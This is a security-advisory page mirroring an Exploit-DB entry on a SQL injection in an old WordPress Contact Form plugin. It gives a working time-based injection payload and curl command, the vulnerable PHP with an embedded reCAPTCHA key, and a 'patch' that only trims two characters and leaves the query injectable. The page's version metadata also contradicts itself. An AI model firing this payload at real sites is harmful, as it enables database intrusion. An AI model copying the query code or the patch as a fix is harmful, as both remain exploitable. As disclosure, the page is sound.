WordPress Contact Form plugin

vendor:

Contact Form Plugin

by:

Skraps

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: Contact Form Plugin

Affected Version From: 2.7.2005

Affected Version To: 2.7.2005

Patch Exists: YES

Related CWE: N/A

CPE: a:wordpress:contact_form_plugin

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2011

WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability

A SQL injection vulnerability exists in WordPress Contact Form plugin version 2.7.5 and earlier. An attacker can send a specially crafted POST request to the vulnerable application to exploit this vulnerability. The vulnerable code is located in the easy-form.class.php file, where the application does not properly sanitize user-supplied input before using it in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Mitigation:

Upgrade to the latest version of the WordPress Contact Form plugin.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Contact Form plugin <= 2.7.5 SQL Injection Vulnerability
# Date: 2011-10-13
# Author: Skraps (jackie.craig.sparks(at)live.com jackie.craig.sparks(at)gmail.com @skraps_foo)
# Software Link: http://downloads.wordpress.org/plugin/contact-form-wordpress.zip
# Version: 2.7.5 (tested)

---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/contact-form-wordpress/easy-form.class.php 
wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)
 
e.g.
curl --data "wpcf_easyform_submitted=1&wpcf_easyform_test1=testing&wpcf_easyform_formid=1 AND 1=IF(2>1,BENCHMARK(500000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://127.0.0.1/wordpress/?p=1
 
---------------
Vulnerable code
---------------
Line 49:
    public function the_content($content) {
        global $wpdb;
        global $table_name;
        global $settings_table_name;

        $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';

        if ($_POST['wpcf_easyform_submitted'] == 1) {

            $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);

---------------
Patch
---------------

*** ./easy-form.class.php.orig	2011-10-13 19:53:05.674800956 -0400
--- ./easy-form.class.php	2011-10-13 19:51:21.442799615 -0400
***************
*** 54,61 ****
          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
          
          if ($_POST['wpcf_easyform_submitted'] == 1) {
!         
!             $form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$_POST['wpcf_easyform_formid']);
              
              $continue = true;
              
--- 54,63 ----
          $private_key = '6LdKkr8SAAAAAN3d0B3M_EMh1qx4PeHtOre8loCy';
          
          if ($_POST['wpcf_easyform_submitted'] == 1) {
!        	    $wpcf_easyform_formid=$_POST['wpcf_easyform_formid'];
!             $wpcf_easyform_formid=substr($wpcf_easyform_formid,2); 
!             
! 	$form = $wpdb->get_results("SELECT * FROM $table_name WHERE ID = ".$wpcf_easyform_formid);
              
              $continue = true;
              
***************
*** 71,80 ****
              if ($continue) {
              
                  //loop through the fields of this form (read from DB) and build the message here
!                 $form_fields = $wpdb->get_results("
          			SELECT *
          			FROM $settings_table_name
!         			WHERE form_id = ".$_POST['wpcf_easyform_formid']."
          			ORDER BY position
          		");
          		
--- 73,82 ----
              if ($continue) {
              
                  //loop through the fields of this form (read from DB) and build the message here
! 		$form_fields = $wpdb->get_results("
          			SELECT *
          			FROM $settings_table_name
!         			WHERE form_id = ".$wpcf_easyform_formid."
          			ORDER BY position
          		");